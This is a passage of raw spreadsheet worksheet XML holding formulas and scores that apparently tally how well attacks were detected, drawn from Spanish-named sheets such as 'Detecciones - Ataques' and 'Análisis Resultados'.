      <c r="F154" s="876" t="s">
        <v>2779</v>
      </c>
      <c r="G154" s="337">
        <f>E157/E156</f>
        <v>0.5</v>
      </c>
      <c r="K154" s="352" t="s">
        <v>1687</v>
      </c>
      <c r="L154" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M154" s="374">
        <f>'(D) - Análisis Resultados II - '!CS22</f>
        <v>1</v>
      </c>
      <c r="N154" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K154)</f>
        <v>1</v>
      </c>
      <c r="O154" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P154" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q154" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T154" s="865" t="s">
        <v>1687</v>
      </c>
      <c r="U154" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V154" s="69">
        <v>0.0</v>
      </c>
      <c r="W154" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T154)</f>
        <v>1</v>
      </c>
      <c r="X154" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y154" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z154" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB154" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC154" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD154" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="155">
      <c r="D155" s="877" t="s">
        <v>2780</v>
      </c>
      <c r="E155" s="878">
        <v>74.0</v>
      </c>
      <c r="F155" s="20" t="s">
        <v>2781</v>
      </c>
      <c r="G155" s="336">
        <f t="shared" ref="G155:G157" si="12">1-G152</f>
        <v>0</v>
      </c>
      <c r="K155" s="352" t="s">
        <v>486</v>
      </c>
      <c r="L155" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M155" s="374">
        <f>'(D) - Análisis Resultados II - '!CT22</f>
        <v>1</v>
      </c>
      <c r="N155" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K155)</f>
        <v>1</v>
      </c>
      <c r="O155" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P155" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q155" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T155" s="865" t="s">
        <v>486</v>
      </c>
      <c r="U155" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V155" s="69">
        <v>0.0</v>
      </c>
      <c r="W155" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T155)</f>
        <v>1</v>
      </c>
      <c r="X155" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y155" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z155" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB155" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC155" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD155" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="156">
      <c r="D156" s="879" t="s">
        <v>2782</v>
      </c>
      <c r="E156" s="880">
        <v>82.0</v>
      </c>
      <c r="F156" s="876" t="s">
        <v>2783</v>
      </c>
      <c r="G156" s="337">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="K156" s="352" t="s">
        <v>1889</v>
      </c>
      <c r="L156" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M156" s="374">
        <f>'(D) - Análisis Resultados II - '!CU22</f>
        <v>1</v>
      </c>
      <c r="N156" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K156)</f>
        <v>1</v>
      </c>
      <c r="O156" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P156" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q156" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T156" s="865" t="s">
        <v>1889</v>
      </c>
      <c r="U156" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V156" s="69">
        <v>0.0</v>
      </c>
      <c r="W156" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T156)</f>
        <v>1</v>
      </c>
      <c r="X156" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y156" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z156" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB156" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC156" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD156" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="157">
      <c r="D157" s="881" t="s">
        <v>2784</v>
      </c>
      <c r="E157" s="882">
        <v>41.0</v>
      </c>
      <c r="F157" s="883" t="s">
        <v>2785</v>
      </c>
      <c r="G157" s="614">
        <f t="shared" si="12"/>
        <v>0.5</v>
      </c>
      <c r="K157" s="352" t="s">
        <v>1187</v>
      </c>
      <c r="L157" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M157" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CV22</f>
        <v>-</v>
      </c>
      <c r="N157" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K157)</f>
        <v>0</v>
      </c>
      <c r="O157" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P157" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q157" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T157" s="865" t="s">
        <v>1187</v>
      </c>
      <c r="U157" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V157" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W157" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T157)</f>
        <v>0</v>
      </c>
      <c r="X157" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y157" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z157" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB157" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC157" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD157" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="158">
      <c r="K158" s="352" t="s">
        <v>560</v>
      </c>
      <c r="L158" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!DH$131)
</f>
        <v>1</v>
      </c>
      <c r="M158" s="374">
        <f>'(D) - Análisis Resultados II - '!CW22</f>
        <v>0</v>
      </c>
      <c r="N158" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K158)</f>
        <v>1</v>
      </c>
      <c r="O158" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P158" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q158" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T158" s="865" t="s">
        <v>560</v>
      </c>
      <c r="U158" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!DH$131)
</f>
        <v>1</v>
      </c>
      <c r="V158" s="69">
        <v>1.0</v>
      </c>
      <c r="W158" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T158)</f>
        <v>1</v>
      </c>
      <c r="X158" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y158" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z158" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB158" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC158" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD158" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="159">
      <c r="K159" s="352" t="s">
        <v>1175</v>
      </c>
      <c r="L159" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M159" s="374">
        <f>'(D) - Análisis Resultados II - '!CX22</f>
        <v>1</v>
      </c>
      <c r="N159" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K159)</f>
        <v>1</v>
      </c>
      <c r="O159" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P159" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q159" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T159" s="865" t="s">
        <v>1175</v>
      </c>
      <c r="U159" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V159" s="69">
        <v>1.0</v>
      </c>
      <c r="W159" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T159)</f>
        <v>1</v>
      </c>
      <c r="X159" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y159" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z159" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB159" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC159" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD159" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="160">
      <c r="K160" s="505" t="s">
        <v>1926</v>
      </c>
      <c r="L160" s="884">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="M160" s="450">
        <f>'(D) - Análisis Resultados II - '!CY22</f>
        <v>0.2727272727</v>
      </c>
      <c r="N160" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K160)</f>
        <v>1</v>
      </c>
      <c r="O160" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P160" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q160" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T160" s="885" t="s">
        <v>1926</v>
      </c>
      <c r="U160" s="886">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="V160" s="69">
        <v>0.09090909090909091</v>
      </c>
      <c r="W160" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T160)</f>
        <v>1</v>
      </c>
      <c r="X160" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y160" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z160" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB160" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC160" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD160" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="161">
      <c r="U161" s="368"/>
      <c r="V161" s="368"/>
      <c r="W161" s="368"/>
      <c r="X161" s="368"/>
    </row>
    <row r="162">
      <c r="K162" s="42" t="s">
        <v>2786</v>
      </c>
      <c r="L162" s="417">
        <f>COUNTIF(P81:P160,1)</f>
        <v>13</v>
      </c>
      <c r="T162" s="42" t="s">
        <v>2787</v>
      </c>
      <c r="U162" s="417">
        <f>COUNTIF(Y81:Y160,1)</f>
        <v>12</v>
      </c>
      <c r="X162" s="42" t="s">
        <v>2788</v>
      </c>
      <c r="Y162" s="417">
        <f>COUNTIF(AC81:AC160,1)</f>
        <v>14</v>
      </c>
    </row>
    <row r="163">
      <c r="K163" s="42" t="s">
        <v>2789</v>
      </c>
      <c r="L163" s="417">
        <f>80-(L162+L164+L165)</f>
        <v>20</v>
      </c>
      <c r="T163" s="42" t="s">
        <v>2790</v>
      </c>
      <c r="U163" s="417">
        <f>80-(U162+U164+U165)</f>
        <v>19</v>
      </c>
      <c r="X163" s="42" t="s">
        <v>2791</v>
      </c>
      <c r="Y163" s="417">
        <f>80-(Y162+Y164+Y165)</f>
        <v>18</v>
      </c>
    </row>
    <row r="164">
      <c r="K164" s="42" t="s">
        <v>2792</v>
      </c>
      <c r="L164" s="417">
        <f>COUNTIF(Q81:Q160,1)</f>
        <v>11</v>
      </c>
      <c r="T164" s="42" t="s">
        <v>2793</v>
      </c>
      <c r="U164" s="417">
        <f>COUNTIF(Z81:Z160,1)</f>
        <v>14</v>
      </c>
      <c r="X164" s="42" t="s">
        <v>2794</v>
      </c>
      <c r="Y164" s="417">
        <f>COUNTIF(AD81:AD160,1)</f>
        <v>13</v>
      </c>
    </row>
    <row r="165">
      <c r="K165" s="42" t="s">
        <v>2795</v>
      </c>
      <c r="L165" s="417">
        <f>COUNTIF(P81:P160,"-")</f>
        <v>36</v>
      </c>
      <c r="T165" s="42" t="s">
        <v>2796</v>
      </c>
      <c r="U165" s="417">
        <f>COUNTIF(Y81:Y160,"-")</f>
        <v>35</v>
      </c>
      <c r="X165" s="42" t="s">
        <v>2796</v>
      </c>
      <c r="Y165" s="417">
        <f>COUNTIF(AD81:AD160,"-")</f>
        <v>35</v>
      </c>
    </row>
    <row r="231">
      <c r="K231" s="576" t="s">
        <v>2797</v>
      </c>
      <c r="L231" s="221"/>
      <c r="M231" s="221"/>
      <c r="N231" s="221"/>
      <c r="O231" s="221"/>
      <c r="P231" s="221"/>
      <c r="Q231" s="222"/>
      <c r="V231" s="576" t="s">
        <v>2797</v>
      </c>
      <c r="W231" s="221"/>
      <c r="X231" s="221"/>
      <c r="Y231" s="221"/>
      <c r="Z231" s="221"/>
      <c r="AA231" s="221"/>
      <c r="AB231" s="222"/>
    </row>
    <row r="235">
      <c r="K235" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="L235" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ28</f>
        <v>0.04393441684</v>
      </c>
      <c r="V235" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="W235" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ28</f>
        <v>0.04393441684</v>
      </c>
    </row>
    <row r="236">
      <c r="K236" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="L236" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ29</f>
        <v>0.2177240228</v>
      </c>
      <c r="V236" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="W236" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ29</f>
        <v>0.2177240228</v>
      </c>
    </row>
    <row r="237">
      <c r="K237" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="L237" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ30</f>
        <v>0.3773692556</v>
      </c>
      <c r="V237" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="W237" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ30</f>
        <v>0.3773692556</v>
      </c>
    </row>
    <row r="238">
      <c r="K238" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="L238" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ31</f>
        <v>0.4277893364</v>
      </c>
      <c r="V238" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="W238" s="69">
        <f>'(D) - Análisis Resultados I - S'!FZ31</f>
        <v>0.4277893364</v>
      </c>
    </row>
    <row r="239">
      <c r="K239" s="42" t="s">
        <v>25</v>
      </c>
      <c r="L239" s="69">
        <f>'(D) - Análisis Resultados II - '!EX11</f>
        <v>0.5759995794</v>
      </c>
      <c r="V239" s="42" t="s">
        <v>32</v>
      </c>
      <c r="W239" s="69">
        <f>'(D) - Análisis Resultados III -'!FA11</f>
        <v>0.6014944481</v>
      </c>
    </row>
    <row r="240">
      <c r="V240" s="42" t="s">
        <v>25</v>
      </c>
      <c r="W240" s="69">
        <v>0.5759995793962408</v>
      </c>
    </row>
    <row r="259">
      <c r="K259" s="576" t="s">
        <v>2802</v>
      </c>
      <c r="L259" s="221"/>
      <c r="M259" s="221"/>
      <c r="N259" s="221"/>
      <c r="O259" s="221"/>
      <c r="P259" s="221"/>
      <c r="Q259" s="222"/>
      <c r="V259" s="576" t="s">
        <v>2802</v>
      </c>
      <c r="W259" s="221"/>
      <c r="X259" s="221"/>
      <c r="Y259" s="221"/>
      <c r="Z259" s="221"/>
      <c r="AA259" s="221"/>
      <c r="AB259" s="222"/>
    </row>
    <row r="265">
      <c r="K265" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="L265" s="13" t="s">
        <v>2801</v>
      </c>
      <c r="M265" s="887" t="s">
        <v>2732</v>
      </c>
      <c r="V265" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="W265" s="13" t="s">
        <v>2801</v>
      </c>
      <c r="X265" s="887" t="s">
        <v>2733</v>
      </c>
      <c r="Y265" s="42" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="266">
      <c r="K266" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="L266" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD65</f>
        <v>0.3351228241</v>
      </c>
      <c r="M266" s="369">
        <f>'(D) - Análisis Resultados II - '!EX21</f>
        <v>0.1854618168</v>
      </c>
      <c r="V266" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="W266" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD65</f>
        <v>0.3351228241</v>
      </c>
      <c r="X266" s="369">
        <f>'(D) - Análisis Resultados III -'!FA22</f>
        <v>0.6710071942</v>
      </c>
      <c r="Y266" s="69">
        <v>0.18546181677616205</v>
      </c>
    </row>
    <row r="267">
      <c r="K267" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="L267" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD66</f>
        <v>0</v>
      </c>
      <c r="M267" s="369">
        <f>'(D) - Análisis Resultados II - '!EX22</f>
        <v>0.05366134369</v>
      </c>
      <c r="V267" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="W267" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD66</f>
        <v>0</v>
      </c>
      <c r="X267" s="369">
        <f>'(D) - Análisis Resultados III -'!FA23</f>
        <v>0.9997122716</v>
      </c>
      <c r="Y267" s="69">
        <v>0.053661343691555174</v>
      </c>
    </row>
    <row r="268">
      <c r="K268" s="379" t="s">
        <v>951</v>
      </c>
      <c r="L268" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD67</f>
        <v>0.448433584</v>
      </c>
      <c r="M268" s="369">
        <f>'(D) - Análisis Resultados II - '!EX23</f>
        <v>0.9</v>
      </c>
      <c r="V268" s="379" t="s">
        <v>951</v>
      </c>
      <c r="W268" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD67</f>
        <v>0.448433584</v>
      </c>
      <c r="X268" s="369">
        <f>'(D) - Análisis Resultados III -'!FA24</f>
        <v>0.6333333333</v>
      </c>
      <c r="Y268" s="69">
        <v>0.9</v>
      </c>
    </row>
    <row r="269">
      <c r="K269" s="379" t="s">
        <v>633</v>
      </c>
      <c r="L269" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD68</f>
        <v>0.4545454545</v>
      </c>
      <c r="M269" s="369">
        <f>'(D) - Análisis Resultados II - '!EX24</f>
        <v>0.8522727273</v>
      </c>
      <c r="V269" s="379" t="s">
        <v>633</v>
      </c>
      <c r="W269" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD68</f>
        <v>0.4545454545</v>
      </c>
      <c r="X269" s="369">
        <f>'(D) - Análisis Resultados III -'!FA25</f>
        <v>0.75</v>
      </c>
      <c r="Y269" s="69">
        <v>0.8522727272727273</v>
      </c>
    </row>
    <row r="270">
      <c r="K270" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="L270" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD69</f>
        <v>0</v>
      </c>
      <c r="M270" s="369">
        <f>'(D) - Análisis Resultados II - '!EX25</f>
        <v>0.5</v>
      </c>
      <c r="V270" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="W270" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD69</f>
        <v>0</v>
      </c>
      <c r="X270" s="369">
        <f>'(D) - Análisis Resultados III -'!FA26</f>
        <v>1</v>
      </c>
      <c r="Y270" s="69">
        <v>0.5</v>
      </c>
    </row>
    <row r="271">
      <c r="K271" s="379" t="s">
        <v>244</v>
      </c>
      <c r="L271" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD70</f>
        <v>0.5714285714</v>
      </c>
      <c r="M271" s="369">
        <f>'(D) - Análisis Resultados II - '!EX26</f>
        <v>0.7142857143</v>
      </c>
      <c r="V271" s="379" t="s">
        <v>244</v>
      </c>
      <c r="W271" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD70</f>
        <v>0.5714285714</v>
      </c>
      <c r="X271" s="369">
        <f>'(D) - Análisis Resultados III -'!FA27</f>
        <v>0.7142857143</v>
      </c>
      <c r="Y271" s="69">
        <v>0.7142857142857143</v>
      </c>
    </row>
    <row r="272">
      <c r="K272" s="379" t="s">
        <v>427</v>
      </c>
      <c r="L272" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD71</f>
        <v>0.2</v>
      </c>
      <c r="M272" s="369">
        <f>'(D) - Análisis Resultados II - '!EX27</f>
        <v>0.6</v>
      </c>
      <c r="V272" s="379" t="s">
        <v>427</v>
      </c>
      <c r="W272" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD71</f>
        <v>0.2</v>
      </c>
      <c r="X272" s="369">
        <f>'(D) - Análisis Resultados III -'!FA28</f>
        <v>0.4</v>
      </c>
      <c r="Y272" s="69">
        <v>0.6</v>
      </c>
    </row>
    <row r="273">
      <c r="K273" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="L273" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD72</f>
        <v>0.3471070309</v>
      </c>
      <c r="M273" s="369">
        <f>'(D) - Análisis Resultados II - '!EX28</f>
        <v>0.368431225</v>
      </c>
      <c r="V273" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="W273" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD72</f>
        <v>0.3471070309</v>
      </c>
      <c r="X273" s="369">
        <f>'(D) - Análisis Resultados III -'!FA29</f>
        <v>0.4209203914</v>
      </c>
      <c r="Y273" s="69">
        <v>0.36843122495066427</v>
      </c>
    </row>
    <row r="274">
      <c r="K274" s="379" t="s">
        <v>209</v>
      </c>
      <c r="L274" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD73</f>
        <v>0.5897435897</v>
      </c>
      <c r="M274" s="369">
        <f>'(D) - Análisis Resultados II - '!EX29</f>
        <v>0.7179487179</v>
      </c>
      <c r="V274" s="379" t="s">
        <v>209</v>
      </c>
      <c r="W274" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD73</f>
        <v>0.5897435897</v>
      </c>
      <c r="X274" s="369">
        <f>'(D) - Análisis Resultados III -'!FA30</f>
        <v>0.7307692308</v>
      </c>
      <c r="Y274" s="69">
        <v>0.7179487179487178</v>
      </c>
    </row>
    <row r="275">
      <c r="K275" s="379" t="s">
        <v>664</v>
      </c>
      <c r="L275" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD74</f>
        <v>0.4147727273</v>
      </c>
      <c r="M275" s="369">
        <f>'(D) - Análisis Resultados II - '!EX30</f>
        <v>0.6761363636</v>
      </c>
      <c r="V275" s="379" t="s">
        <v>664</v>
      </c>
      <c r="W275" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD74</f>
        <v>0.4147727273</v>
      </c>
      <c r="X275" s="369">
        <f>'(D) - Análisis Resultados III -'!FA31</f>
        <v>0.5</v>
      </c>
      <c r="Y275" s="69">
        <v>0.6761363636363636</v>
      </c>
    </row>
    <row r="276">
      <c r="K276" s="379" t="s">
        <v>357</v>
      </c>
      <c r="L276" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD75</f>
        <v>0.6</v>
      </c>
      <c r="M276" s="369">
        <f>'(D) - Análisis Resultados II - '!EX31</f>
        <v>0.7</v>
      </c>
      <c r="V276" s="379" t="s">
        <v>357</v>
      </c>
      <c r="W276" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD75</f>
        <v>0.6</v>
      </c>
      <c r="X276" s="369">
        <f>'(D) - Análisis Resultados III -'!FA32</f>
        <v>0.8</v>
      </c>
      <c r="Y276" s="69">
        <v>0.7</v>
      </c>
    </row>
    <row r="277">
      <c r="K277" s="379" t="s">
        <v>310</v>
      </c>
      <c r="L277" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD76</f>
        <v>0.00119760479</v>
      </c>
      <c r="M277" s="369">
        <f>'(D) - Análisis Resultados II - '!EX32</f>
        <v>0.3012371907</v>
      </c>
      <c r="V277" s="379" t="s">
        <v>310</v>
      </c>
      <c r="W277" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD76</f>
        <v>0.00119760479</v>
      </c>
      <c r="X277" s="369">
        <f>'(D) - Análisis Resultados III -'!FA33</f>
        <v>0.5968052268</v>
      </c>
      <c r="Y277" s="69">
        <v>0.30123719066130833</v>
      </c>
    </row>
    <row r="278">
      <c r="K278" s="379" t="s">
        <v>292</v>
      </c>
      <c r="L278" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD77</f>
        <v>0.4</v>
      </c>
      <c r="M278" s="369">
        <f>'(D) - Análisis Resultados II - '!EX33</f>
        <v>0.6</v>
      </c>
      <c r="V278" s="379" t="s">
        <v>292</v>
      </c>
      <c r="W278" s="368">
        <f>'(D) - Análisis Resultados I - S'!GD77</f>
        <v>0.4</v>
      </c>
      <c r="X278" s="369">
        <f>'(D) - Análisis Resultados III -'!FA34</f>
        <v>0.4</v>
      </c>
      <c r="Y278" s="69">
        <v>0.6</v>
      </c>
    </row>
    <row r="279">
      <c r="K279" s="422" t="s">
        <v>558</v>
      </c>
      <c r="L279" s="384">
        <f>'(D) - Análisis Resultados I - S'!GD78</f>
        <v>0.4994456763</v>
      </c>
      <c r="M279" s="385">
        <f>'(D) - Análisis Resultados II - '!EX34</f>
        <v>0.4431818182</v>
      </c>
